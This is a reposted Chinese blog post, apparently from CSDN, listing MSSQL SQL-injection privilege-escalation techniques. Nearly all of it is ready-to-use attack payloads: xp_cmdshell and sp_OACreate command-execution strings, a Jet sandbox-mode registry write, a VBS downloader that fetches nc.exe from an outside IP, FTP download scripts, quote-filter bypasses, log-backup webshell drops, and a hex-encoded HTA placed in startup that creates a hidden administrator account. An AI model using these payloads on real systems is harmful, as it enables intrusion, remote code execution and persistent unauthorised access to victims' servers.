mysql差异备份提权_MSSQL注入提权的一些方法

最新推荐文章于 2024-03-28 16:37:48 发布
最新推荐文章于 2024-03-28 16:37:48 发布
阅读量138 收藏
点赞数
文章标签: mysql差异备份提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_26642481/article/details/113950432
版权

MSSQL注入提权思路:

SA权限:利用XP_CMDSHELL,Sp_OACreate等储存过程直接提权.(前提储存过程健在)

相关SQL语句

XP_CMDSHELL:

数字型;EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--

字符型&搜索型';EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--

Sp_OACreate:

字型;declare @shell int exec sp_oacreate 'wscript.shell',@shell output

exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c

cmdline'--

字符型&搜索型';declare @shell int exec sp_oacreate

'wscript.shell',@shell output exec sp_oamethod

@shell,'run',null,'c:/windows/system32/cmd.exe /c cmdline'--

p.s.(2000系统WINDOWS改为WINNT)

沙盘提权:

开启沙盘模式;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',1--

后利用jet.oledb执行系统命令;select * from

openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select

shell("cmd.exe /c cmdline")')--

p.s.(2000系统WINDOWS改为WINNT)

直接备份一句话木马;exec sp_makewebtask 'WEB绝对路径/fuck.asp',' select '''' ';--

P.S.(WEB与DATA在同一主机,知道WEB目录)

下载文件到目标主机方式:

利用NBSI等工具写入VBS文件

echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://125.113.114.49/nc.exe^",0:xPost.Send():Set

sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type =

1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile

^"c:/c.exe^",2 >c:/labeng.vbs

该语句作用:写一个名为labeng的VBS文件到C盘;

接着执行CSCRIPT C:/LABENG.VBS;VBS文件作用:下载http://125.113.114.49/nc.exe到C:/C.EXE;

FTP&TFTP传输:

FTP:

CMDLINE依次输入

ECHO FTP>FTP.TXT

ECHO OPEN 125.*.*.*>>FTP.TXT

ECHO USERNAME>>FTP.TXT

ECHIO PASSWORD>>FTP.TXT

ECHO GET XX.EXE>>FTP.TXT

ECHO BYE>>FTP.TXT

作用:写一个FTP.TXT文件,内容为

FTP

OPEN 125.*.*.*

USERNAME

PASSWORD

GET XX.EXE

BYE

接着执行FTP -S:FTP.TXT目标主机就会到125.*.*.*下载XX.EXE;

TFTP类似~~

DB权限:

WEB&DATA同一主机:1,列目录找到WEB目录,LOG或差异备份拿WEBSHELL,接着提权,2,猜表拿管理员ID和密码,进后台拿WEBSHELL..3,备份提权语句到启动项,等待重起

分离的情况:1,猜表拿管理员ID和密码,进后台拿WEBSHELL..2,备份提权语句到启动项,等待重起.

判断DATA主机IP:

本地NC -L -V -P 1433 监听1433端口

;insert

into

opendatasource('sqloledb','server=自己的IP;uid=test;pwd=test;

database=test').test.dbo.ku select name from master.dbo.sysdatabases--

暴WEB路径(PS:DATA&WEB同一主机)

;create table labeng(lala nvarchar(255), null)--

;DECLARE

@result varchar(255) EXEC master.dbo.xp_regread

'HKEY_LOCAL_MACHINE','SYSTEM/ControlSet001/Services/W3SVC/Parameters/Virtual

Roots','/',@result output insert into labeng (lala) values(@result);--

;and 1=(select count(*) from labeng where lala>1)-- 或者 ;and 1=(selet top 1 lala from labeng)--

过滤'的处理:

;DECLARE @S VARCHAR(4000);SET @S=CAST(SQL语句的十六进制数 AS VARCHAR(4000));EXEC(@S)--

LOG备份语句:

;alter database 表 set RECOVERY FULL--

;create table cmd (a image)--

;backup log 表 to disk = 'c:/Sammy' with init--

;insert into cmd (a) values ('')--

;backup log 表 to disk = 'WEB目录/1.asp'--

一句话变形:

a).

b).

c).%>

d).

e).

备份文件到启动项:

将LOG备份中''改为HTA.BAT等文件的十六进制内容

例:labeng.hta

内容:

on error resume next

Set WS = createobject("WScript.Shell")

WS.run "cmd /c net1.exe user test$ labeng?123 /add & net1.exe localgroup

administrators test$ /add & del labeng.hta",0

-----------------------------------------------------------------------------

转化为十六进制:

0x3C534352495054204C414E47554147453D225642536372697074223E0D0A6F6E206572726F7220726573756D65206E6578740D0A536574205753203D206372656174656F626A6563742822575363726970742E5368656C6C22290D0A57532E72756E2022636D64202F63206E6574312E6578652075736572207465737424206C6162656E673F313233202F6164642026206E6574312E657865206C6F63616C67726F75702061646D696E6973747261746F7273207465737424202F61646420262064656C206C6162656E672E687461222C300D0A3C2F7363726970743E3C736372697074206C616E67756167653D6A6176617363726970743E77696E646F772E636C6F736528293B3C2F7363726970743E0D0A0D0A0D0A

-----------------------------------------------------------------------------

SQL语句:

;insert

into cmd (a)

values(0x3C534352495054204C414E47554147453D225642536372697074223E0D0A6F6E206572726F7220726573756D65206E6578740D0A536574205753203D206372656174656F626A6563742822575363726970742E5368656C6C22290D0A57532E72756E2022636D64202F63206E6574312E6578652075736572207465737424206C6162656E673F313233202F6164642026206E6574312E657865206C6F63616C67726F75702061646D696E6973747261746F7273207465737424202F61646420262064656C206C6162656E672E687461222C300D0A3C2F7363726970743E3C736372697074206C616E67756167653D6A6176617363726970743E77696E646F772E636C6F736528293B3C2F7363726970743E0D0A0D0A0D0A)--

------------------------------------------------------------------------------------

提升SQL用户为SA权限:

on error resume next

Set WS = createobject("WScript.Shell")

WS.run "cmd /c echo exec master.dbo.sp_addsrvrolemember

boayo,sysadmin>c:/test.qry & isql -E /U alma /P /i c:/test.qry & del

labeng.hta",0

用法同上...

转载自csdn

李_涛
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
提权思路之MSSQL差异备份取系统权限
09-14
看了下面的文章,不是让大家搞破坏,大家可以加强自己服务器的安全性。
Linux利用UDF库实现Mysql提权
09-10
请注意,这种提权方法具有潜在的安全风险,如果被恶意利用,可能导致系统安全漏洞。因此,理解并妥善管理MySQL的UDF功能至关重要,只有在必要且受控的环境下进行此类操作。在生产环境中,务必遵循最小权限原则,并...
mysql差异备份提权_提权思路之MSSQL差异备份取系统权限
weixin_34731217的博客
02-02 96
MSsql差异备份获取webshell几乎人人皆知,那么我们可以利用差异备份出来的文件当作恶意代码让系统执行了之后自动提升权限或者添加管理员吗?答案当然可以了,kj021320测试了N次之后跟你说!那么我们得考虑文件摆放的位置~什么地方系统会运行呢?这个其实算是废话吧!大家不用想都知道通用地方C:\DocumentsandSettings\AllUsers\「开始」菜单\程序\启...
mysql差异备份提权_MSSQL注入时的手工差异备份提权 ___and___ 巧用差异备份DB_OWNER提权...
weixin_29313547的博客
02-08 154
字符型1.恢复当前库;alter database 当前库 set RECOVERY FULL--2.创建表cmd;create table cmd (a p_w_picpath)--3.备份当前库到D:\cmd1;backup log 当前库 to disk = 'D:\cmd1' with init--4.插入一句话代码到创建的表cmd;insert into cmd (a) values (...
MSSQL注入时的手工差异备份提权
CC's Blog
12-07 3463
转自某个转自别人的博客,最初是谁原创的不清楚了。。。 语句有点问题,修改了下(红色部分,提交一句话内容要进行SQL转码)。。。。 字符型 1.恢复当前库 ;alter database 当前库 set RECOVERY FULL-- 2.创建表cmd ;create table cmd (a image)-- 3.备份当前库到D:\sql ;backup log 当前库 to di
mysql.zip_ROOT_mysql提权_udf_udf mysql_提权
09-19
提权用的 udf 得到root帐号可以用这个提权
mssql,mysqll注入语法.zip_KMF_security_提权
09-24
标题“mssql,mysqll注入语法.zip_KMF_security_提权”表明这个压缩包文件主要关注的是SQL注入攻击相关的知识,特别是针对Microsoft SQL Server(mssql)和MySQL(通常拼写为mysql)数据库系统的安全问题。...
udf提权_udf提权_udf.dll下载提权_mysql提权_ballsv6_提权_源码
10-04
mysql提权,udf提权所需要的dll文件,有64位和32位
必备神器->MYSQL高版本提权工具-V 2011
01-19
必备神器->MYSQL高版本提权工具-V 2011
所有差异备份工具包(getwebshell2,sqlcomm,小志 SQL沙盘提权备份工具.exe,GetWebshellah56bug大众版,MSSQL_UP,DB_OWNER权限备份hta到启动项提权的小工具)
05-02
所有差异备份工具包(getwebshell2,sqlcomm,小志 SQL沙盘提权备份工具.exe,GetWebshellah56bug大众版,MSSQL_UP,DB_OWNER权限备份hta到启动项提权的小工具等等!)
MSSQL注入时的手工差异备份提权 ___and___ 巧用差异备份DB_OWNER提权
weixin_33743248的博客
11-23 184
字符型1.恢复当前库;alter database 当前库 set RECOVERY FULL--2.创建表cmd;create table cmd (a p_w_picpath)--3.备份当前库到D:\cmd1;backup log 当前库 to disk = 'D:\cmd1' with init--4.插入一句话代码到创建的表cmd;insert into ...
mysql差异备份提权_复习一下sql server的差异备份
weixin_42190623的博客
02-08 82
复习一下sql server的差异备份更新时间:2007年03月08日 00:00:00 作者:MSSQL差异备份,就是和前一次备份作对比,把不一样的内容备份下来,这样,只要前一次备份后,插入新的内容,差异备份就可以把刚插入的内容备份出来,而这个备份文件将大大减少,得到webShell的成功也提高了不少!差异备份的流程大概这样:1.完整备份一次(保存位置当然可以改)backupdatabas...
SQL Server 数据库常见提权总结
最新发布
m0_64481831的博客
03-28 2108
前面总结了linux和Windows的提权方式以及Mysql提权,这篇文章讲讲SQL Server数据库的提权
mssql提权总结
st3pby的博客
12-30 2672
mssql提权总结
数据库注入提权总结(三)
蚁景网安学院
08-12 4950
差异备份数据库得到webshell。在sqlserver里dbo和sa权限都有备份数据库权限,我们可以把数据库备份称asp文件,这样我们就可以通过mssqlserver的备份数据库功能生成一个网页小马。
内网渗透(二)之提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-14 5667
对于内网渗透,到我们拿到了公网主机的权限后,并获得了一些本机的信息时。我们首先得知道我们的权限。如果获取到的是普通用户权限,则我们需要想办法提权至管理员权限。如果获得的已经是管理员权限,则可以忽略这一步。对于Windows系统,只有提权到管理员权限后,才可以运行mimikatz以及执行一些其他高权限的操作。对于Linux系统,很多命令需要root权限才能执行,只有提权到root权限才能执行后面的信息收集等工作。
mssql差异备份拿shell
一个码农的笔记
03-08 5322
(1)首先: declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x4e6577706f7274 backup database @a to disk=@s; 注意:0x4e6577706f7274 这个字符串是数据库名字的十六进制数字,这个这个字符串的转换用hackbar这个小工具进行转换 这里的数据库名字是:Newpor
提权技术详解:HTTP、PHP、MySQL入门
"提权技术详解.pptx" 在IT领域,提权技术是指通过获取更高的系统权限来访问或控制原本限制访问的资源。这通常涉及到网络安全和系统管理,特别是当涉及到恶意攻击者试图突破系统安全限制时。这份PPT详细讲解了与提权...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值